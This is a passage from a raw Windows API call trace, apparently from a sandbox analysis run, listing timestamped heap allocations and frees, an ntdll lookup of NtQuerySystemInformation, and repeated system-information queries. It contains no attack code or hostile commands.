lpMem=0x2026d889730 | out: hHeap=0x2026c630000) returned 1 [0271.973] GetProcessHeap () returned 0x2026c630000 [0271.973] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c71c540 | out: hHeap=0x2026c630000) returned 1 [0271.973] GetProcessHeap () returned 0x2026c630000 [0271.973] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d8895b0 | out: hHeap=0x2026c630000) returned 1 [0271.973] GetProcessHeap () returned 0x2026c630000 [0271.973] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d806430 | out: hHeap=0x2026c630000) returned 1 [0271.973] GetProcessHeap () returned 0x2026c630000 [0271.973] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d9c60 | out: hHeap=0x2026c630000) returned 1 [0271.973] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x2026d6d9d60 [0271.973] GetProcessHeap () returned 0x2026c630000 [0271.973] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d807820 [0271.974] GetProcessHeap () returned 0x2026c630000 [0271.974] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d9c10 [0271.974] GetProcessHeap () returned 0x2026c630000 [0271.974] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x12c) returned 0x2026c71c540 [0271.974] GetProcessHeap () returned 0x2026c630000 [0271.974] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x138) returned 0x2026c71bc80 [0271.974] GetProcessHeap () returned 0x2026c630000 [0271.974] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x140) returned 0x2026c6852c0 [0271.974] GetProcessHeap () returned 0x2026c630000 [0271.974] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d889fb0 [0271.974] GetProcessHeap () returned 0x2026c630000 [0271.974] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x140) returned 0x2026c6856b0 [0271.974] GetProcessHeap () returned 0x2026c630000 [0271.974] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d8081c0 [0271.974] GetProcessHeap () returned 0x2026c630000 [0271.974] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d9c90 [0271.974] GetProcessHeap () returned 0x2026c630000 [0271.974] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c6852c0 | out: hHeap=0x2026c630000) returned 1 [0271.974] GetProcessHeap () returned 0x2026c630000 [0271.974] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x1f4) returned 0x2026d2edcd0 [0271.974] GetProcessHeap () returned 0x2026c630000 [0271.974] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xfc) returned 0x2026c692000 [0271.974] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xc751dfde38 | out: phModule=0xc751dfde38*=0x7ffcea380000) returned 1 [0271.975] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQuerySystemInformation") returned 0x7ffcea425a50 [0271.975] NtQuerySystemInformation (in: SystemInformationClass=0x86, SystemInformation=0xc751dfdf70, Length=0x20, ResultLength=0x0 | out: SystemInformation=0xc751dfdf70, ResultLength=0x0) returned 0x0 [0271.975] GetProcessHeap () returned 0x2026c630000 [0271.975] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d8898f0 [0271.975] GetProcessHeap () returned 0x2026c630000 [0271.975] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x48) returned 0x2026d7915c0 [0271.975] GetProcessHeap () returned 0x2026c630000 [0271.975] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d8060c0 [0271.975] GetProcessHeap () returned 0x2026c630000 [0271.975] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d9cc0 [0271.975] GetProcessHeap () returned 0x2026c630000 [0271.975] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x40) returned 0x2026d7916b0 [0271.975] GetProcessHeap () returned 0x2026c630000 [0271.975] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x34) returned 0x2026d8895b0 [0271.975] GetProcessHeap () returned 0x2026c630000 [0271.975] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c71bc80 | out: hHeap=0x2026c630000) returned 1 [0271.975] GetProcessHeap () returned 0x2026c630000 [0271.975] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c6856b0 | out: hHeap=0x2026c630000) returned 1 [0271.975] GetProcessHeap () returned 0x2026c630000 [0271.975] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d8081c0 | out: hHeap=0x2026c630000) returned 1 [0271.975] GetProcessHeap () returned 0x2026c630000 [0271.975] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d9c90 | out: hHeap=0x2026c630000) returned 1 [0271.975] GetProcessHeap () returned 0x2026c630000 [0271.975] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d889fb0 | out: hHeap=0x2026c630000) returned 1 [0271.975] GetProcessHeap () returned 0x2026c630000 [0271.975] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d2edcd0 | out: hHeap=0x2026c630000) returned 1 [0271.975] GetProcessHeap () returned 0x2026c630000 [0271.975] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c692000 | out: hHeap=0x2026c630000) returned 1 [0271.975] GetProcessHeap () returned 0x2026c630000 [0271.975] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d7915c0 | out: hHeap=0x2026c630000) returned 1 [0271.975] GetProcessHeap () returned 0x2026c630000 [0271.975] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d8060c0 | out: hHeap=0x2026c630000) returned 1 [0271.975] GetProcessHeap () returned 0x2026c630000 [0271.975] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d9cc0 | out: hHeap=0x2026c630000) returned 1 [0271.975] GetProcessHeap () returned 0x2026c630000 [0271.976] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d8898f0 | out: hHeap=0x2026c630000) returned 1 [0271.976] GetProcessHeap () returned 0x2026c630000 [0271.976] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d7916b0 | out: hHeap=0x2026c630000) returned 1 [0271.976] GetProcessHeap () returned 0x2026c630000 [0271.976] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c71c540 | out: hHeap=0x2026c630000) returned 1 [0271.976] GetProcessHeap () returned 0x2026c630000 [0271.976] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d8895b0 | out: hHeap=0x2026c630000) returned 1 [0271.976] GetProcessHeap () returned 0x2026c630000 [0271.976] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d807820 | out: hHeap=0x2026c630000) returned 1 [0271.976] GetProcessHeap () returned 0x2026c630000 [0271.976] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d9c10 | out: hHeap=0x2026c630000) returned 1 [0271.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda50, Length=0x50, ResultLength=0x0) [0271.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda50, Length=0x50, ResultLength=0x0) [0271.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda50, Length=0x50, ResultLength=0x0) [0271.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd940, Length=0x50, ResultLength=0x0) [0271.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd940, Length=0x50, ResultLength=0x0) [0271.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd940, Length=0x50, ResultLength=0x0) [0271.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd940, Length=0x50, ResultLength=0x0) [0271.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd870, Length=0x38, ResultLength=0x0) [0271.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6a0, Length=0x28, ResultLength=0x0) [0271.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6a0, Length=0x28, ResultLength=0x0) [0271.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6a0, Length=0x28, ResultLength=0x0) [0271.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6a0, Length=0x28, ResultLength=0x0) [0271.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd710, Length=0x28, ResultLength=0x0) [0271.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd870, Length=0x38, ResultLength=0x0) [0271.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd790, Length=0x28, ResultLength=0x0) [0271.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd790, Length=0x28, ResultLength=0x0) [0271.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd630, Length=0x20, ResultLength=0x0) [0271.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5b0, Length=0x20, ResultLength=0x0) [0271.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5b0, Length=0x20, ResultLength=0x0) [0271.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5b0, Length=0x20, ResultLength=0x0) [0271.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd870, Length=0x38, ResultLength=0x0) [0271.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd870, Length=0x38, ResultLength=0x0) [0271.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6f0, Length=0x20, ResultLength=0x0) [0271.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd680, Length=0x20, ResultLength=0x0) [0271.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd680, Length=0x20, ResultLength=0x0) [0271.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.986] GetProcessHeap () returned 0x2026c630000 [0271.986] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d8071f0 [0271.986] GetProcessHeap () returned 0x2026c630000 [0271.986] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d9e50 [0271.986] GetProcessHeap () returned 0x2026c630000 [0271.986] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x11c) returned 0x2026c63a4b0 [0271.988] GetProcessHeap () returned 0x2026c630000 [0271.988] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x128) returned 0x2026c63bb40 [0271.988] GetProcessHeap () returned 0x2026c630000 [0271.988] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d8893b0 [0271.988] GetProcessHeap () returned 0x2026c630000 [0271.988] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x130) returned 0x2026c71c040 [0271.988] GetProcessHeap () returned 0x2026c630000 [0271.988] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d805e00 [0271.988] GetProcessHeap () returned 0x2026c630000 [0271.988] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d9dc0 [0271.988] GetProcessHeap () returned 0x2026c630000 [0271.988] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c71c400 | out: hHeap=0x2026c630000) returned 1 [0271.988] GetProcessHeap () returned 0x2026c630000 [0271.988] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x1e4) returned 0x2026d2edcd0 [0271.989] GetProcessHeap () returned 0x2026c630000 [0271.989] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x104) returned 0x2026c692ee0 [0271.989] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xc751dfdd88 | out: phModule=0xc751dfdd88*=0x7ffcea380000) returned 1 [0271.989] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQuerySystemInformation") returned 0x7ffcea425a50 [0271.989] NtQuerySystemInformation (in: SystemInformationClass=0x86, SystemInformation=0xc751dfdeb0, Length=0x20, ResultLength=0x0 | out: SystemInformation=0xc751dfdeb0, ResultLength=0x0) returned 0x0 [0271.989] GetProcessHeap () returned 0x2026c630000 [0271.989] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d889bf0 [0271.989] GetProcessHeap () returned 0x2026c630000 [0271.989] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x50) returned 0x2026d859540 [0271.989] GetProcessHeap () returned 0x2026c630000 [0271.989] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d807820 [0271.989] GetProcessHeap () returned 0x2026c630000 [0271.989] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d9e20 [0271.990] GetProcessHeap () returned 0x2026c630000 [0271.990] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x40) returned 0x2026d790e40 [0271.990] GetProcessHeap () returned 0x2026c630000 [0271.990] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c63bb40 | out: hHeap=0x2026c630000) returned 1 [0271.990] GetProcessHeap () returned 0x2026c630000 [0271.990] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c71c040 | out: hHeap=0x2026c630000) returned 1 [0271.990] GetProcessHeap () returned 0x2026c630000 [0271.990] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d805e00 | out: hHeap=0x2026c630000) returned 1 [0271.990] GetProcessHeap () returned 0x2026c630000 [0271.990] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d9dc0 | out: hHeap=0x2026c630000) returned 1 [0271.990] GetProcessHeap () returned 0x2026c630000 [0271.990] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d8893b0 | out: hHeap=0x2026c630000) returned 1 [0271.990] GetProcessHeap () returned 0x2026c630000 [0271.990] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d2edcd0 | out: hHeap=0x2026c630000) returned 1 [0271.990] GetProcessHeap () returned 0x2026c630000 [0271.990] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c692ee0 | out: hHeap=0x2026c630000) returned 1 [0271.990] GetProcessHeap () returned 0x2026c630000 [0271.990] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d859540 | out: hHeap=0x2026c630000) returned 1 [0271.990] GetProcessHeap () returned 0x2026c630000 [0271.990] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d807820 | out: hHeap=0x2026c630000) returned 1 [0271.990] GetProcessHeap () returned 0x2026c630000 [0271.990] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d9e20 | out: hHeap=0x2026c630000) returned 1 [0271.990] GetProcessHeap () returned 0x2026c630000 [0271.990] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d889bf0 | out: hHeap=0x2026c630000) returned 1 [0271.990] GetProcessHeap () returned 0x2026c630000 [0271.991] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d7916b0 | out: hHeap=0x2026c630000) returned 1 [0271.991] GetProcessHeap () returned 0x2026c630000 [0271.991] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c63a4b0 | out: hHeap=0x2026c630000) returned 1 [0271.991] GetProcessHeap () returned 0x2026c630000 [0271.991] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d790e40 | out: hHeap=0x2026c630000) returned 1 [0271.991] GetProcessHeap () returned 0x2026c630000 [0271.991] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d8071f0 | out: hHeap=0x2026c630000) returned 1 [0271.991] GetProcessHeap () returned 0x2026c630000 [0271.991] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d9e50 | out: hHeap=0x2026c630000) returned 1 [0271.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.992] GetProcessHeap () returned 0x2026c630000 [0271.992] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d807fb0 [0271.992] GetProcessHeap () returned 0x2026c630000 [0271.992] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d9ce0 [0271.992] GetProcessHeap () returned 0x2026c630000 [0271.992] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x122) returned 0x2026c63ad00 [0271.993] GetProcessHeap () returned 0x2026c630000 [0271.993] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x130) returned 0x2026c71c680 [0271.993] GetProcessHeap () returned 0x2026c630000 [0271.994] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d889fb0 [0271.994] GetProcessHeap () returned 0x2026c630000 [0271.994] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x138) returned 0x2026c71c7c0 [0271.994] GetProcessHeap () returned 0x2026c630000 [0271.994] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d805b40 [0271.994] GetProcessHeap () returned 0x2026c630000 [0271.994] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d9bf0 [0271.994] GetProcessHeap () returned 0x2026c630000 [0271.994] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c71bc80 | out: hHeap=0x2026c630000) returned 1 [0271.994] GetProcessHeap () returned 0x2026c630000 [0271.994] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x1ec) returned 0x2026d2edcd0 [0271.994] GetProcessHeap () returned 0x2026c630000 [0271.994] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x2f4) returned 0x2026d7e9bb0 [0271.994] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xc751dfdd88 | out: phModule=0xc751dfdd88*=0x7ffcea380000) returned 1 [0271.995] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQuerySystemInformation") returned 0x7ffcea425a50 [0271.995] NtQuerySystemInformation (in: SystemInformationClass=0x86, SystemInformation=0xc751dfdeb0, Length=0x20, ResultLength=0x0 | out: SystemInformation=0xc751dfdeb0, ResultLength=0x0) returned 0x0 [0271.995] GetProcessHeap () returned 0x2026c630000 [0271.995] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d889c70 [0271.995] GetProcessHeap () returned 0x2026c630000 [0271.995] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x78) returned 0x2026d7beaa0 [0271.995] GetProcessHeap () returned 0x2026c630000 [0271.995] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d8081c0 [0271.995] GetProcessHeap () returned 0x2026c630000 [0271.995] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d9ab0 [0271.996] GetProcessHeap () returned 0x2026c630000 [0271.996] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x68) returned 0x2026d7a9f20 [0271.996] GetProcessHeap () returned 0x2026c630000 [0271.996] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c71c680 | out: hHeap=0x2026c630000) returned 1 [0271.996] GetProcessHeap () returned 0x2026c630000 [0271.996] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c71c7c0 | out: hHeap=0x2026c630000) returned 1 [0271.996] GetProcessHeap () returned 0x2026c630000 [0271.996] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d805b40 | out: hHeap=0x2026c630000) returned 1 [0271.996] GetProcessHeap () returned 0x2026c630000 [0271.996] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d9bf0 | out: hHeap=0x2026c630000) returned 1 [0271.996] GetProcessHeap () returned 0x2026c630000 [0271.996] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d889fb0 | out: hHeap=0x2026c630000) returned 1 [0271.996] GetProcessHeap () returned 0x2026c630000 [0271.996] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d2edcd0 | out: hHeap=0x2026c630000) returned 1 [0271.996] GetProcessHeap () returned 0x2026c630000 [0271.996] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d7e9bb0 | out: hHeap=0x2026c630000) returned 1 [0271.996] GetProcessHeap () returned 0x2026c630000 [0271.996] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d7beaa0 | out: hHeap=0x2026c630000) returned 1 [0271.996] GetProcessHeap () returned 0x2026c630000 [0271.996] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d8081c0 | out: hHeap=0x2026c630000) returned 1 [0271.996] GetProcessHeap () returned 0x2026c630000 [0271.996] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d9ab0 | out: hHeap=0x2026c630000) returned 1 [0271.996] GetProcessHeap () returned 0x2026c630000 [0271.996] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d889c70 | out: hHeap=0x2026c630000) returned 1 [0271.996] GetProcessHeap () returned 0x2026c630000 [0271.996] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d7be9a0 | out: hHeap=0x2026c630000) returned 1 [0271.997] GetProcessHeap () returned 0x2026c630000 [0271.997] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c63ad00 | out: hHeap=0x2026c630000) returned 1 [0271.997] GetProcessHeap () returned 0x2026c630000 [0271.997] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d7a9f20 | out: hHeap=0x2026c630000) returned 1 [0271.997] GetProcessHeap () returned 0x2026c630000 [0271.997] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d807fb0 | out: hHeap=0x2026c630000) returned 1 [0271.997] GetProcessHeap () returned 0x2026c630000 [0271.997] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d9ce0 | out: hHeap=0x2026c630000) returned 1 [0271.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf70, Length=0x28, ResultLength=0x0) [0271.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.999] GetProcessHeap () returned 0x2026c630000 [0271.999] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d805eb0 [0271.999] GetProcessHeap () returned 0x2026c630000 [0271.999] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d9e80 [0271.999] GetProcessHeap () returned 0x2026c630000 [0271.999] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xfe) returned 0x2026c692bb0 [0272.001] GetProcessHeap () returned 